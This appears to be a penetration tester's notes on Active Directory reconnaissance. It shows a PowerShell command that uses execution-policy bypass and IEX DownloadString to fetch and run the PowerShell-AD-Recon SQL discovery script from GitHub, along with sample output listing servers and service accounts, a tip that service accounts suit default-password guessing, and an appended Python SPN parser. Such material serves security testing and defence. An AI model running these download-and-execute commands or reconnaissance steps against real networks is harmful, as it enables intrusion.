https://github.com/PyroTek3/PowerShell-AD-Recon
C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET
Domain : UNLUCKY.NET
ServerName : unlucklaptop.unlucky.net
Port :
Instance : SQLEXPRESS
ServiceAccountDN :
OperatingSystem : {Windows 8.1 Enterprise}
OSServicePack :
LastBootup : 1/10/2015 11:47:55 AM
OSVersion : {6.3 (9600)}
Description :
Domain : UNLUCKY.NET
ServerName : unluckserver.unlucky.net
Port : 1433
Instance :
ServiceAccountDN : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem :
OSServicePack :
LastBootup : 12/31/1600 4:00:00 PM
OSVersion :
Description :
SrvAcctUserID : svc-userid
SrvAcctDescription : ---SNIP---
The rest of the repo has fun stuff too:
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
- Find Exchange Servers
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
- Get a list of all the service accounts. Those are always good candidates for company defaults.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
- Forest Info
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
- Searches the forest for SPNs whose service name matches a list of known services. This will take a LONG time on a big domain/forest.
Default list from the script:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP","ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV","Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),
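To make the two pieces above concrete (the per-server fields in the Discover-PSMSSQLServers output and the service filter used by Discover-PSInterestingServices), here is an added example, not code from the repo, that parses MSSQLSvc SPNs the way the output splits them (FQDN, numeric port vs. named instance) and checks any SPN against that default filter. The SPN strings are constructed, and the prefix-match behaviour is an assumption, since the page does not show how the script compares them.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample SPNs, shaped like servicePrincipalName values
# exported from AD (hosts are not real).
SAMPLE_SPNS = [
    "MSSQLSvc/unlucklaptop.unlucky.net:SQLEXPRESS",
    "MSSQLSvc/unluckserver.unlucky.net:1433",
    "MSSQLSvc/unluckserver.unlucky.net",
    "HOST/unluckserver.unlucky.net",
    "TERMSRV/unlucklaptop.unlucky.net",
]

# Copied from the $StandardSPNServiceFilter list on the page.
STANDARD_SPN_SERVICE_FILTER = (
    "ADAM", "AGPM", "bo", "CESREMOTE", "Dfs", "DNS", "Exchange", "FIMService",
    "ftp", "http", "IMAP", "ipp", "iSCSITarget", "kadmin", "ldap", "MS", "sql",
    "nfs", "secshd", "sip", "SMTP", "SoftGrid", "TERMSRV", "Virtual", "vmrc",
    "vnc", "vpn", "vssrvc", "WSMAN", "xmpp",
)

@dataclass
class SqlSpn:
    domain: str
    server_name: str
    port: Optional[int]       # set when the suffix is numeric (e.g. 1433)
    instance: Optional[str]   # set when the suffix is a named instance

def parse_mssql_spn(spn: str) -> Optional[SqlSpn]:
    """MSSQLSvc/<fqdn>[:<port>|:<instance>] -> the fields the output shows.
    No suffix means the default instance; non-MSSQL SPNs return None."""
    m = re.fullmatch(r"MSSQLSvc/([^:/]+)(?::([^:/]+))?", spn, re.IGNORECASE)
    if not m:
        return None
    host, suffix = m.group(1).lower(), m.group(2)
    domain = host.split(".", 1)[1].upper() if "." in host else ""
    port = int(suffix) if suffix and suffix.isdigit() else None
    instance = suffix if suffix and not suffix.isdigit() else None
    return SqlSpn(domain, host, port, instance)

def sql_inventory(spns) -> list:
    """Every MSSQLSvc SPN in the input, parsed; others are skipped."""
    return [p for s in spns if (p := parse_mssql_spn(s)) is not None]

def interesting_service(spn: str) -> Optional[str]:
    """Filter entry matching the SPN's service class, or None.
    Assumption: case-insensitive prefix match, first entry wins."""
    service_class = spn.split("/", 1)[0].lower()
    for entry in STANDARD_SPN_SERVICE_FILTER:
        if service_class.startswith(entry.lower()):
            return entry
    return None
```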